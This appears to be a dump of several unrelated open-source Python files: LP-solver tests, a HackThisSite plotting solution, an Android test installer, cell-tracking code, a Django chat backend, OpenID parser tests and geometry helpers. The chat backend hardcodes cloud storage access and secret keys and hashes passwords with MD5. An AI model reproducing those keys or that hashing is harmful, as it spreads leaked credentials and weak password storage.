assert False, "Solve this LP with cvxpy returns status: {:}".format(
prob.status)
def test_err1():
"""A case seidel solver fails to solve correctly. I discovered this
while working on toppra. """
v = array([-1.e-09, 1.e+00, 0.e+00])
a = array([-0.02020202, 0.02020202, 1.53515768, 4.3866269, -
3.9954173, -1.53515768, -4.3866269, 3.9954173])
b = array([-1., 1., -185.63664301, 156.27072783, -
209.00954213, 185.63664301, -156.27072783, 209.00954213])
c = array([0., -0.0062788, -1., -2., -4., -1., -1., -1.])
low = array([-100., 0.])
high = array([1.00000000e+02, 6.26434609e-02])
data = seidel.solve_lp2d(v, a, b, c, low, high, np.array(
[0, 5])) # only break at this active constraints
res, optval, optvar, active_c = data
# solve with cvxpy
x = cvx.Variable(2)
constraints = [a * x[0] + b * x[1] + c <= 0,
low <= x, x <= high]
obj = cvx.Maximize(v[0] * x[0] + v[1] * x[1] + v[2])
prob = cvx.Problem(obj, constraints)
prob.solve()
# solve with the method to test and assert correctness
if prob.status == "optimal":
assert res == 1
np.testing.assert_allclose(optval, prob.value)
np.testing.assert_allclose(optvar, np.asarray(x.value).flatten())
elif prob.status == "infeasible":
assert res == 0
else:
assert False, "Solve this LP with cvxpy returns status: {:}".format(
prob.status)
def test_err2():
"""A case that fails. Discovered on 31/10/2018."""
v = array([-1.e-09, 1.e+00, 0.e+00])
a = array([-0.04281662, 0.04281662, 0., 0., 0.,
0., 0., 0., 0., 0.,
0., 0., 0., 0., 0.,
0., -1.27049648, 0.63168407, 0.54493736, -0.17238098,
0.22457236, 0.6543007, 1.24159883, 1.27049648, -0.63168407,
-0.54493736, 0.17238098, -0.22457236, -0.6543007, -1.24159883])
b = array([-1., 1., -70.14534325, 35.42759706,
31.23305996, -9.04430553, 12.51402852, 36.71562421,
68.63795557, 70.14534325, -35.42759706, -31.23305996,
9.04430553, -12.51402852, -36.71562421, -68.63795557,
-9.70931351, 4.71707751, 3.93518034, -1.41196299,
1.69317949, 4.88204872, 9.47085771, 9.70931351,
-4.71707751, -3.93518034, 1.41196299, -1.69317949,
-4.88204872, -9.47085771])
c = array([0., -1.56875277, -50., -50.,
-50., -50., -50., -50.,
-50., -50., -50., -50.,
-50., -50., -50., -50.,
-50., -50., -50., -50.,
-50., -50., -50., -50.,
-50., -50., -50., -50.,
-50., -50.])
low = array([-1.e+08, 0.e+00])
high = array([1.e+08, 1.e+08])
active_c = np.array([0, -4])
data = seidel.solve_lp2d(
v, a, b, c, low, high, np.array([0, -4])) # only break at this active constraints
res, optval, optvar, active_c = data
# solve with cvxpy
x = cvx.Variable(2)
constraints = [a * x[0] + b * x[1] + c <= 0,
low <= x, x <= high]
obj = cvx.Maximize(v[0] * x[0] + v[1] * x[1] + v[2])
prob = cvx.Problem(obj, constraints)
prob.solve(solver='CVXOPT')
# solve with the method to test and assert correctness
if prob.status == "optimal":
assert res == 1
np.testing.assert_allclose(optval, prob.value)
np.testing.assert_allclose(optvar[1], np.asarray(x.value).flatten()[1])
elif prob.status == "infeasible":
assert res == 0
else:
assert False, "Solve this LP with cvxpy returns status: {:}".format(
prob.status)
| mit |
MarcusTherkildsen/HackThisSite | prog_missions/4/main.py | 1 | 3379 | # -*- coding: utf-8 -*-
"""
Created on Wed Oct 07 22:10:39 2015
@author: Marcus Therkildsen
"""
from __future__ import division
import matplotlib.pyplot as plt
import numpy as np
def deg2rad(deg_in):
return deg_in*np.pi/180
def xy(r,phi):
return r*np.cos(phi), r*np.sin(phi)
if __name__ == '__main__':
# Load the xml file
xml = np.genfromtxt('plotMe.xml', delimiter=',', dtype='str',autostrip = True)
# Number of line elements
num_lines = list(xml).count('<Line>')
# Number of arc elements
num_arcs = list(xml).count('<Arc>')
# Prepare arrays
lines = np.zeros([num_lines,4]) # (x_start,x_end,y_start,y_end)
c_lines = np.empty(num_lines,dtype='str')
arcs = np.zeros([num_arcs,5]) # (x_center,y_center, arc_start (in degrees), arc_extend (in degrees), radius)
c_arcs = np.empty(num_arcs,dtype='str')
# Go through xml document
tj_lines = -1
tj_arcs = -1
for i in xrange(len(xml)):
if '<Line>' in xml[i]:
tj_lines+=1
# In case no color is defined, predefine it to be white
color_ = 'w'
for k in xrange(5):
if 'YEnd' in xml[i+k+1]:
y_end = float(xml[i+k+1][6:-7])
elif 'YStart' in xml[i+k+1]:
y_start = float(xml[i+k+1][8:-9])
elif 'XEnd' in xml[i+k+1]:
x_end = float(xml[i+k+1][6:-7])
elif 'XStart' in xml[i+k+1]:
x_start = float(xml[i+k+1][8:-9])
elif 'Color' in xml[i+k+1]:
color_ = xml[i+k+1][7:-8]
lines[tj_lines,:] = [x_start, x_end, y_start, y_end]
c_lines[tj_lines] = color_
if '<Arc>' in xml[i]:
tj_arcs+=1
# In case no color is defined, predefine it to be white
color_ = 'w'
for k in xrange(6):
if 'XCenter' in xml[i+k+1]:
x_center = float(xml[i+k+1][9:-10])
elif 'YCenter' in xml[i+k+1]:
y_center = float(xml[i+k+1][9:-10])
elif 'ArcStart' in xml[i+k+1]:
arc_start = float(xml[i+k+1][10:-11])
elif 'ArcExtend' in xml[i+k+1]:
arc_extend = float(xml[i+k+1][11:-12])
elif 'Radius' in xml[i+k+1]:
radius = float(xml[i+k+1][8:-9])
elif 'Color' in xml[i+k+1]:
color_ = xml[i+k+1][7:-8]
arcs[tj_arcs,:] = [x_center,y_center,arc_start,arc_extend,radius]
c_arcs[tj_arcs] = color_
"""
Plot
"""
fig, ax =plt.subplots()
# Color background black
ax.set_axis_bgcolor('k')
[ax.plot(lines[i,:2],lines[i,2:],color = c_lines[i]) for i in xrange(num_lines)]
# Plot the arcs. Remember that the arc should begin at arc_start and end at arc_start + arc_extend
for i in xrange(num_arcs):
stuff = np.array(xy(arcs[i,4],np.arange(deg2rad(arcs[i,2]),deg2rad(arcs[i,2])+deg2rad(arcs[i,3]),0.1))).T
x_ = stuff[:,0]+arcs[i,0]
y_ = stuff[:,1]+arcs[i,1]
ax.plot(x_,y_,color = c_arcs[i])
# Remove labels
plt.setp( ax.get_xticklabels(), visible=False)
plt.setp( ax.get_yticklabels(), visible=False)
plt.savefig('done.png',dpi=400,bbox_inches='tight')
plt.show() | mit |
XiaosongWei/crosswalk-test-suite | wrt/wrt-sharedmode-android-tests/inst.apk.py | 19 | 6532 | #!/usr/bin/env python
import os
import shutil
import glob
import time
import sys
import subprocess
from optparse import OptionParser, make_option
SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))
PKG_NAME = os.path.basename(SCRIPT_DIR)
TEST_PREFIX = os.environ['HOME']
PARAMETERS = None
ADB_CMD = "adb"
def doCMD(cmd):
# Do not need handle timeout in this short script, let tool do it
print "-->> \"%s\"" % cmd
output = []
cmd_return_code = 1
cmd_proc = subprocess.Popen(
cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True)
while True:
output_line = cmd_proc.stdout.readline().strip("\r\n")
cmd_return_code = cmd_proc.poll()
if output_line == '' and cmd_return_code is not None:
break
sys.stdout.write("%s\n" % output_line)
sys.stdout.flush()
output.append(output_line)
return (cmd_return_code, output)
def overwriteCopy(src, dest, symlinks=False, ignore=None):
if not os.path.exists(dest):
os.makedirs(dest)
shutil.copystat(src, dest)
sub_list = os.listdir(src)
if ignore:
excl = ignore(src, sub_list)
sub_list = [x for x in sub_list if x not in excl]
for i_sub in sub_list:
s_path = os.path.join(src, i_sub)
d_path = os.path.join(dest, i_sub)
if symlinks and os.path.islink(s_path):
if os.path.lexists(d_path):
os.remove(d_path)
os.symlink(os.readlink(s_path), d_path)
try:
s_path_s = os.lstat(s_path)
s_path_mode = stat.S_IMODE(s_path_s.st_mode)
os.lchmod(d_path, s_path_mode)
except Exception as e:
pass
elif os.path.isdir(s_path):
overwriteCopy(s_path, d_path, symlinks, ignore)
else:
shutil.copy2(s_path, d_path)
def doCopy(src_item=None, dest_item=None):
try:
if os.path.isdir(src_item):
overwriteCopy(src_item, dest_item, symlinks=True)
else:
if not os.path.exists(os.path.dirname(dest_item)):
os.makedirs(os.path.dirname(dest_item))
shutil.copy2(src_item, dest_item)
except Exception as e:
return False
return True
def uninstPKGs():
action_status = True
for root, dirs, files in os.walk(SCRIPT_DIR):
for file in files:
if file.endswith(".apk"):
cmd = "%s -s %s uninstall org.xwalk.%s" % (
ADB_CMD, PARAMETERS.device, os.path.basename(os.path.splitext(file)[0]))
(return_code, output) = doCMD(cmd)
for line in output:
if "Failure" in line:
action_status = False
break
# if os.path.isdir("%s/opt/%s/" % (TEST_PREFIX, PKG_NAME)):
#shutil.rmtree("%s/opt/%s/" % (TEST_PREFIX, PKG_NAME))
return action_status
def instPKGs():
action_status = True
# for root, dirs, files in os.walk(SCRIPT_DIR):
# for file in files:
# if file.endswith(".apk"):
# cmd = "%s -s %s install %s" % (ADB_CMD,
# PARAMETERS.device, os.path.join(root, file))
for item in glob.glob("%s/*" % SCRIPT_DIR):
if item.endswith(".apk"):
continue
elif item.endswith("inst.py"):
continue
else:
item_name = os.path.basename(item)
if not doCopy(item, "%s/opt/%s/%s" %
(TEST_PREFIX, PKG_NAME, item_name)):
action_status = False
os.rename(
"%s/opt/%s/resources/apk/webappintel.apk" %
(TEST_PREFIX, PKG_NAME), "%s/opt/%s/resources/apk/WebApp.apk" %
(TEST_PREFIX, PKG_NAME))
print "Package push to host %s/opt/%s successfully!" % (TEST_PREFIX, PKG_NAME)
path = "/tmp/Crosswalk_sharedmode.conf"
if os.path.exists(path):
if not doCopy(path, "%s/opt/%s/Crosswalk_sharedmode.conf" %
(TEST_PREFIX, PKG_NAME)):
action_status = False
(
return_code, output) = doCMD(
"cat \"%s/opt/%s/Crosswalk_sharedmode.conf\" | grep \"Android_Crosswalk_Path\" | cut -d \"=\" -f 2" %
(TEST_PREFIX, PKG_NAME))
for line in output:
if "Failure" in line:
action_status = False
break
if not output == []:
ANDROID_CROSSWALK_PATH = output[0]
CROSSWALK = os.path.basename(ANDROID_CROSSWALK_PATH)
if not doCopy(ANDROID_CROSSWALK_PATH, "%s/opt/%s/resources/installer/%s" %
(TEST_PREFIX, PKG_NAME, CROSSWALK)):
action_status = False
return action_status
def main():
try:
global TEST_PREFIX
usage = "usage: inst.py -i"
opts_parser = OptionParser(usage=usage)
opts_parser.add_option(
"-s", dest="device", action="store", help="Specify device")
opts_parser.add_option(
"-i", dest="binstpkg", action="store_true", help="Install package")
opts_parser.add_option(
"-u", dest="buninstpkg", action="store_true", help="Uninstall package")
opts_parser.add_option(
"-t", dest="testprefix", action="store", help="unzip path prefix", default=os.environ["HOME"])
global PARAMETERS
(PARAMETERS, args) = opts_parser.parse_args()
except Exception as e:
print "Got wrong option: %s, exit ..." % e
sys.exit(1)
if not PARAMETERS.device:
(return_code, output) = doCMD("adb devices")
for line in output:
if str.find(line, "\tdevice") != -1:
PARAMETERS.device = line.split("\t")[0]
break
TEST_PREFIX = PARAMETERS.testprefix
if not PARAMETERS.device:
print "No device found"
sys.exit(1)
if PARAMETERS.binstpkg and PARAMETERS.buninstpkg:
print "-i and -u are conflict"
sys.exit(1)
if PARAMETERS.buninstpkg:
os.system(
"%s -s %s uninstall %s" %
(ADB_CMD,
PARAMETERS.device,
"org.xwalk.runtime.lib"))
# if not uninstPKGs():
# sys.exit(1)
else:
os.system(
"%s -s %s install -r %s" %
(ADB_CMD,
PARAMETERS.device,
"resources/installer/XWalkRuntimeLib.apk"))
# if not instPKGs():
# sys.exit(1)
if __name__ == "__main__":
main()
sys.exit(0)
| bsd-3-clause |
lym/allura-git | Allura/allura/controllers/secure.py | 3 | 1060 | # -*- coding: utf-8 -*-
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Sample controller with all its actions protected."""
# This controller is only used when you activate auth. You can safely remove
# this file from your project.
| apache-2.0 |
braysia/covertrack | covertrack/cell.py | 1 | 4510 | import numpy as np
from skimage.measure import regionprops
from copy import deepcopy
PROP_SAVE = ['area', 'cell_id', 'convex_area', 'corr_x', 'corr_y', 'cv_intensity',
'eccentricity', 'equivalent_diameter', 'euler_number', 'extent', 'filled_area',
'major_axis_length', 'max_intensity', 'mean_intensity',
'median_intensity', 'min_intensity', 'orientation',
'perimeter', 'solidity', 'std_intensity', 'total_intensity', 'x', 'y',
'coords']
class CellListMaker(object):
'''Make a list of Cell objects'''
def __init__(self, img, label, params, frame=0):
self.img = img
self.label = label
self.params = params
self.frame = frame
def make_list(self):
cell_prop = regionprops(self.label, self.img, cache=True)
celllist = [Cell(i, self.frame) for i in cell_prop]
return celllist
class CellListMakerScalar(CellListMaker):
'''Make a list of Cell objects but remove any regionprops features
which are tuple, list or array to reduce memory usage.
'''
def make_list(self):
if self.label.any():
cell_prop = regionprops(self.label, self.img, cache=True)
celllist = [Cell(i, self.frame) for i in cell_prop]
features = [i for i in dir(celllist[0].prop) if not i.startswith('_')]
fremoved = []
for i in features:
if type(getattr(celllist[0].prop, i)) in (tuple, list, np.ndarray):
fremoved.append(i)
for i in fremoved:
[j.prop.__delattr__(i) for j in celllist]
return celllist
else:
return []
class Prop(object):
def __init__(self, prop):
for ki in prop.__class__.__dict__.iterkeys():
if '__' not in ki:
setattr(self, ki, prop.__getitem__(ki))
self.label_id = prop.label
pix = prop['intensity_image']
pix = pix[pix != 0]
# CAUTION
# This will not reflected to the objects labels (segmentation)
# if len(pix) > 2:
# pix = pix[(pix > np.nanpercentile(pix, 10)) * (pix<np.nanpercentile(pix, 90))]
self.mean_intensity = np.mean(pix)
self.median_intensity = np.median(pix)
self.total_intensity = prop['area'] * np.mean(pix)
self.std_intensity = np.std(pix)
self.cv_intensity = np.std(pix)/np.mean(pix)
self.x = self.centroid[1]
self.corr_x = self.centroid[1] # will updated when jitter corrected
self.y = self.centroid[0]
self.corr_y = self.centroid[0] # will updated when jitter corrected
self.parent_id = 0
self.frame = np.nan
self.abs_id = 0
self.cell_id = 0
class PropLight(object):
def __init__(self, prop):
for ki in prop.__class__.__dict__.iterkeys():
if ki in PROP_SAVE:
setattr(self, ki, prop.__getitem__(ki))
self.label_id = prop.label
pix = prop['intensity_image']
pix = pix[pix != 0]
# CAUTION
# This will not reflected to the objects labels (segmentation)
# if len(pix) > 2:
# pix = pix[(pix > np.nanpercentile(pix, 10)) * (pix<np.nanpercentile(pix, 90))]
self.mean_intensity = np.mean(pix, dtype=np.float32)
self.median_intensity = np.median(pix)
self.total_intensity = prop['area'] * np.mean(pix, dtype=np.float32)
self.std_intensity = np.std(pix, dtype=np.float32)
self.cv_intensity = np.std(pix, dtype=np.float32)/np.mean(pix, dtype=np.float32)
self.x = prop['centroid'][1]
self.corr_x = prop['centroid'][1] # will updated when jitter corrected
self.y = prop['centroid'][0]
self.corr_y = prop['centroid'][0] # will updated when jitter corrected
self.parent_id = 0
self.frame = np.nan
self.abs_id = 0
self.cell_id = 0
class Cell(object):
'''Cell object which holds Prop.
self.next and self.previous will return an associated cell in the next
frame or previous frame if available.
'''
def __init__(self, prop, frame):
self.frame = frame
self.prop = PropLight(prop)
self.cell_id = None
self.parent = None
self._next = None
self.previous = None
@property
def next(self):
return self._next
@next.setter
def next(self, partner):
self._next = partner
partner.previous = self
| mit |
hezuoguang/ZGVL | WLServer/api/function.py | 1 | 14259 | # -*- coding: UTF-8 -*-
__author__ = 'weimi'
from api.models import *
from django.db.models import Q
import hashlib
import re
import json
from qiniu import Auth
access_key = "MDWzu5EOTAbqoJp5EGxGcdksEcSLnixxAcGsbv2v"
secret_key = "IujhqwUXdusrrLYooPA4WZdJtS7RR6r65TALg2p_"
bucket_name = "weiliao"
pwdfix = "weimi"
photoCount = 43
photoUrl = "http://7xl0k3.com1.z0.glb.clouddn.com/photo"
def safestr(str):
str = str.replace("\r", " ")
str = str.replace("\t", " ")
str = str.replace("\n", " ")
str = str.replace("\\", "\\\\")
str = str.replace("\"", "\\\"")
return str
# 通过uid 和 pwd 获取一个用户 没有返回None
def queryUser(uid, pwd):
try:
pwd = hashlib.new("md5", pwd + pwdfix).hexdigest()
user = User.objects.get(uid = uid, pwd = pwd)
except:
return None
return user
# 通过uid 和 pwd 注册一个用户 返回None表示 uid已被注册, -1 为 服务器发生错误
def registerUser(uid, pwd):
try:
user = User.objects.get(uid = uid)
except:
try:
user = User()
user.uid = uid
user.name = uid
count = User.objects.count()
photo = photoUrl + (str)(count % photoCount + 1) + ".jpg"
user.photo = photo
user.pwd = hashlib.new("md5", pwd + pwdfix).hexdigest()
user.access_token = hashlib.new("md5", uid + pwdfix + user.pwd).hexdigest()
user.save()
return user
except:
return -1
return None
# 参数 text(
# 聊天内容,文字消息为:消息内容; gif表情消息为:gif表情对应的图片名
# 称 名称;语音,图片消息为:资源的url
# )
# type(消息类型)
# access_token
# to_user(接收者uid)
# 返回:-1, 登录失效, -2, to_user不存在, None 服务器发生错误
def insertMessage(text, type, access_token, to_user):
try:
from_user = User.objects.get(access_token = access_token)
except:
return -1
try:
to_user = User.objects.get(uid = to_user)
except:
return -2
try:
if to_user.uid == from_user.uid:
return -2
message = Message()
message.text = safestr(text)
message.type = type
message.to_user = to_user
message.save()
from_user.messgaes.add(message)
from_user.save()
return {"message" : message}
except:
return None
# 通过access_token 获得 消息id大于since_id的数据, 并且不多于 count 条
def queryNewMessages(since_id, access_token, count):
try:
user = User.objects.get(access_token = access_token)
except:
return -1
try:
if (int)(since_id) > 0:
# 查找 id > since_id 并且由 user 接收的 message 最近的 count 条
messages_to_user = Message.objects.filter(to_user = user, id__gt = since_id).order_by("id")[0 : count]
# 查找 id > since_id 并且由 user 发出的 message 最近的 count 条
messages_from_user = user.messgaes.filter(id__gt = since_id).order_by("id")[0 : count]
messages = set()
for message in messages_to_user:
messages.add(message)
for message in messages_from_user:
messages.add(message)
messages = sorted(list(messages), key=lambda m1:m1.id)[0 : count]
return {"messages" : messages}
else:
# 查找 由 user 接收的 message 最近的 count 条
messages_to_user = Message.objects.filter(to_user = user).order_by("-id")[0 : count]
# 查找 由 user 发出的 message 最近的 count 条
messages_from_user = user.messgaes.all().order_by("-id")[0 : count]
messages = set()
for message in messages_to_user:
messages.add(message)
for message in messages_from_user:
messages.add(message)
messages = sorted(list(messages), key=lambda m1:-m1.id)[0 : count]
return {"messages" : messages}
except:
return None
# 通过access_token 获得 消息id小于max_id的数据, 并且不多于 count 条
def queryOldMessages(max_id, access_token, count):
try:
user = User.objects.get(access_token = access_token)
except:
return -1
try:
# 查找 id < max_id 并且由 user 接收的 message 最近的 count 条
messages_to_user = Message.objects.filter(to_user = user, id__lt = max_id).order_by("-id")[0 : count]
# 查找 id < max_id 并且由 user 发出的 message 最近的 count 条
messages_from_user = user.messgaes.filter(id__lt = max_id).order_by("-id")[0 : count]
messages = set()
for message in messages_to_user:
messages.add(message)
for message in messages_from_user:
messages.add(message)
messages = sorted(list(messages), key=lambda m1:-m1.id)[0 : count]
return {"messages" : messages}
except:
return None
# 参数 text(
# text(状态内容)
# access_token
# pics(图片)
# 返回:-1, 登录失效, -2, to_user不存在, None 服务器发生错误
def insertStatus(text, access_token, pics):
try:
from_user = User.objects.get(access_token = access_token)
except:
return -1
try:
status = Status()
status.text = safestr(text)
status.pics = " ".join(pics)
status.from_user = from_user
status.save()
return {"status" : status}
except:
return None
# 通过access_token 获得 status id大于since_id的数据, 并且不多于 count 条
def queryNewStatuses(since_id, access_token, count):
try:
user = User.objects.get(access_token = access_token)
except:
return -1
try:
if (int)(since_id) > 0:
# 查找 id > since_id 并且由 user 发出的 status 或者 user 的好友发出的 status (最近的 count 条)
statuses = Status.objects.filter(Q(from_user = user) | Q(from_user__in = user.friends.all()) ,id__gt = since_id).order_by("id")[0 : count]
for status in statuses:
status.pics = picsWithText(status.pics)
# id大的在前
statuses = sorted(statuses, key=lambda s1:-s1.id)[0 : count]
return {"statuses" : statuses}
else:
# 查找 由 user 发出的 status 或者 user 的好友发出的 status (最近的 count 条)
statuses = Status.objects.filter(Q(from_user = user) | Q(from_user__in = user.friends.all())).order_by("-id")[0 : count]
for status in statuses:
status.pics = picsWithText(status.pics)
# id大的在前
statuses = sorted(statuses, key=lambda s1:-s1.id)[0 : count]
return {"statuses" : statuses}
except:
return None
# 通过access_token 获得 status id大于since_id的数据, 并且不多于 count 条
def queryOldStatuses(max_id, access_token, count):
try:
user = User.objects.get(access_token = access_token)
except:
return -1
try:
# 查找 id > since_id 并且由 user 发出的 status 或者 user 的好友发出的 status 最近的 count 条
statuses = Status.objects.filter(Q(from_user = user) | Q(from_user__in = user.friends.all()), id__lt = max_id).order_by("-id")[0 : count]
for status in statuses:
status.pics = picsWithText(status.pics)
# id大的在前
statuses = sorted(statuses, key=lambda s1:-s1.id)[0 : count]
return {"statuses" : statuses}
except:
return None
# 处理图片(pics) 数组
def picsWithText(text):
arr = text.split(" ")
pics = list()
regex = re.compile(
r'^(?:http|ftp)s?://'
r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|'
r'localhost|'
r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})'
r'(?::\d+)?'
r'(?:/?|[/?]\S+)$', re.IGNORECASE)
for pic in arr:
if regex.match(pic):
pics.append(pic)
return pics
# 添加一条评论
def insertComment(text, access_token, s_id):
try:
from_user = User.objects.get(access_token = access_token)
except:
return -1
try:
status = Status.objects.get(id = s_id)
except:
return -2
try:
comment = Comment()
comment.text = safestr(text)
comment.status = status
comment.from_user = from_user
comment.save()
return {"comment" : comment}
except:
return None
# 获取一条状态的所有评论
def queryComments(s_id):
try:
status = Status.objects.get(id = s_id)
except:
return -2
try:
comments = status.comment_set.all().order_by('-id')
return {"comments" : comments}
except:
return None
# 请求添加朋友
def addFriend(text, access_token, to_user):
try:
from_user = User.objects.get(access_token = access_token)
except:
return -1
try:
to_user = User.objects.get(uid = to_user)
except:
return -2
try:
if to_user.uid == from_user.uid:
return -3
if from_user in to_user.friends.all():
return -4
# 防止请求重复发
newfirends = from_user.newfriends.filter(to_user = to_user, status = 0)
if newfirends.count() != 0:
return -5
newfirends = to_user.newfriends.filter(to_user = from_user, status = 0)
if newfirends.count() != 0:
return -6
newfirend = Newfriend()
newfirend.text = safestr(text)
newfirend.to_user = to_user
newfirend.save()
from_user.newfriends.add(newfirend)
from_user.save()
return {"newfirend" : newfirend}
except:
return None
# 处理一个好友请求
def dowithAddFriend(f_id, access_token, result):
try:
to_user = User.objects.get(access_token = access_token)
except:
return -1
try:
newfirend = Newfriend.objects.get(id = f_id)
except:
return -2
try:
if newfirend.to_user.uid != to_user.uid or newfirend.status != 0:
return -2
newfirend.status = result
newfirend.save()
if result == 2:
from_user = newfirend.user_set.all().first()
to_user.friends.add(from_user)
to_user.save()
insertMessage("我已经同意你的好友请求了,开始对话吧!", 0, access_token, from_user.uid)
return {"newfirend" : newfirend}
except:
return None
# 删除一个好友
def deleteFriend(to_user, access_token):
try:
from_user = User.objects.get(access_token = access_token)
except:
return -1
try:
to_user = User.objects.get(uid = to_user)
except:
return -2
try:
if to_user.uid == from_user.uid:
return -3
if from_user not in to_user.friends.all():
return -4
from_user.friends.remove(to_user)
from_user.save()
return {"from_user" : from_user}
except:
return None
# 获取所有的好友请求
def newFriends(access_token):
try:
user = User.objects.get(access_token = access_token)
except:
return -1
try:
newfriends = Newfriend.objects.filter(to_user = user, status = 0)
return {"newfriends" : newfriends}
except:
return None
# 获取好友列表
def queryFriendList(access_token):
try:
user = User.objects.get(access_token = access_token)
except:
return -1
try:
friendlist = user.friends.all().order_by("-name", "-uid")
return {"friendlist" : friendlist}
except:
return None
# 搜索陌生人
def querySearch(access_token, key, page):
try:
user = User.objects.get(access_token = access_token)
except:
return -1
try:
myfriend_uid = list()
myfriend_uid.append(user.uid)
myfriend = user.friends.all()
for f in myfriend:
myfriend_uid.append(f.uid)
users = User.objects.filter((Q(uid__icontains = key) | Q(name__icontains = key)) & ~Q(uid__in = myfriend_uid))[page * 10 : (page + 1) * 10]
return {"users" : users}
except:
return None
# 获取用户信息
def queryUserInfo(uid, access_token):
try:
user = User.objects.get(access_token = access_token)
except:
return -1
try:
to_user = User.objects.get(uid = uid)
isfriend = 0
if to_user in user.friends.all():
isfriend = 1
return {"user" : to_user, "isfriend" : isfriend}
except:
return -2
# 更新用户信息 "phton",
# name
# "age":
# "sex":
# "birthday":
# "city":
def updateUserInfo(access_token, name, age, sex, birthday, city):
try:
user = User.objects.get(access_token = access_token)
except:
return -1
try:
user.name = safestr(name)
user.age = age
user.sex = sex
user.birthday = birthday
user.city = safestr(city)
user.save()
return {"user" : user}
except:
return None
# 更新用户密码
def updateUserPwd(access_token, pwd, oldpwd):
try:
user = User.objects.get(access_token = access_token)
except:
return -1
try:
if user.pwd != hashlib.new("md5", oldpwd + pwdfix).hexdigest():
return -2
user.pwd = hashlib.new("md5", pwd + pwdfix).hexdigest()
user.access_token = hashlib.new("md5", user.uid + pwdfix + user.pwd).hexdigest()
user.save()
return {"user" : user}
except:
return None
# 更新用户头像
def updateUserPhoto(access_token, photo):
try:
user = User.objects.get(access_token = access_token)
except:
return -1
try:
user.photo = photo
user.save()
return {"user" : user}
except:
return None
# 获得七牛上传凭证 key 文件名
def getQiniu_token(key):
q = Auth(access_key, secret_key)
token = q.upload_token(bucket_name, key)
return {"token" : token} | apache-2.0 |
kawamon/hue | desktop/core/ext-py/python-openid-2.2.5/openid/test/linkparse.py | 87 | 2894 | from openid.consumer.html_parse import parseLinkAttrs
import os.path
import codecs
import unittest
def parseLink(line):
parts = line.split()
optional = parts[0] == 'Link*:'
assert optional or parts[0] == 'Link:'
attrs = {}
for attr in parts[1:]:
k, v = attr.split('=', 1)
if k[-1] == '*':
attr_optional = 1
k = k[:-1]
else:
attr_optional = 0
attrs[k] = (attr_optional, v)
return (optional, attrs)
def parseCase(s):
header, markup = s.split('\n\n', 1)
lines = header.split('\n')
name = lines.pop(0)
assert name.startswith('Name: ')
desc = name[6:]
return desc, markup, map(parseLink, lines)
def parseTests(s):
tests = []
cases = s.split('\n\n\n')
header = cases.pop(0)
tests_line, _ = header.split('\n', 1)
k, v = tests_line.split(': ')
assert k == 'Num Tests'
num_tests = int(v)
for case in cases[:-1]:
desc, markup, links = parseCase(case)
tests.append((desc, markup, links, case))
return num_tests, tests
class _LinkTest(unittest.TestCase):
def __init__(self, desc, case, expected, raw):
unittest.TestCase.__init__(self)
self.desc = desc
self.case = case
self.expected = expected
self.raw = raw
def shortDescription(self):
return self.desc
def runTest(self):
actual = parseLinkAttrs(self.case)
i = 0
for optional, exp_link in self.expected:
if optional:
if i >= len(actual):
continue
act_link = actual[i]
for k, (o, v) in exp_link.items():
if o:
act_v = act_link.get(k)
if act_v is None:
continue
else:
act_v = act_link[k]
if optional and v != act_v:
break
self.assertEqual(v, act_v)
else:
i += 1
assert i == len(actual)
def pyUnitTests():
here = os.path.dirname(os.path.abspath(__file__))
test_data_file_name = os.path.join(here, 'linkparse.txt')
test_data_file = codecs.open(test_data_file_name, 'r', 'utf-8')
test_data = test_data_file.read()
test_data_file.close()
num_tests, test_cases = parseTests(test_data)
tests = [_LinkTest(*case) for case in test_cases]
def test_parseSucceeded():
assert len(test_cases) == num_tests, (len(test_cases), num_tests)
check_desc = 'Check that we parsed the correct number of test cases'
check = unittest.FunctionTestCase(
test_parseSucceeded, description=check_desc)
tests.insert(0, check)
return unittest.TestSuite(tests)
if __name__ == '__main__':
suite = pyUnitTests()
runner = unittest.TextTestRunner()
runner.run(suite)
| apache-2.0 |
daltonmaag/robofab | Lib/robofab/misc/arrayTools.py | 9 | 5159 | #
# Various array and rectangle tools, but mostly rectangles, hence the
# name of this module (not).
#
"""
Rewritten to elimate the numpy dependency
"""
import math
def calcBounds(array):
"""Return the bounding rectangle of a 2D points array as a tuple:
(xMin, yMin, xMax, yMax)
"""
if len(array) == 0:
return 0, 0, 0, 0
xs = [x for x, y in array]
ys = [y for x, y in array]
return min(xs), min(ys), max(xs), max(ys)
def updateBounds(bounds, (x, y), min=min, max=max):
"""Return the bounding recangle of rectangle bounds and point (x, y)."""
xMin, yMin, xMax, yMax = bounds
return min(xMin, x), min(yMin, y), max(xMax, x), max(yMax, y)
def pointInRect((x, y), rect):
"""Return True when point (x, y) is inside rect."""
xMin, yMin, xMax, yMax = rect
return (xMin <= x <= xMax) and (yMin <= y <= yMax)
def pointsInRect(array, rect):
"""Find out which points or array are inside rect.
Returns an array with a boolean for each point.
"""
if len(array) < 1:
return []
xMin, yMin, xMax, yMax = rect
return [(xMin <= x <= xMax) and (yMin <= y <= yMax) for x, y in array]
def vectorLength(vector):
"""Return the length of the given vector."""
x, y = vector
return math.sqrt(x**2 + y**2)
def asInt16(array):
"""Round and cast to 16 bit integer."""
return [int(math.floor(i+0.5)) for i in array]
def normRect((xMin, yMin, xMax, yMax)):
"""Normalize the rectangle so that the following holds:
xMin <= xMax and yMin <= yMax
"""
return min(xMin, xMax), min(yMin, yMax), max(xMin, xMax), max(yMin, yMax)
def scaleRect((xMin, yMin, xMax, yMax), x, y):
"""Scale the rectangle by x, y."""
return xMin * x, yMin * y, xMax * x, yMax * y
def offsetRect((xMin, yMin, xMax, yMax), dx, dy):
"""Offset the rectangle by dx, dy."""
return xMin+dx, yMin+dy, xMax+dx, yMax+dy
def insetRect((xMin, yMin, xMax, yMax), dx, dy):
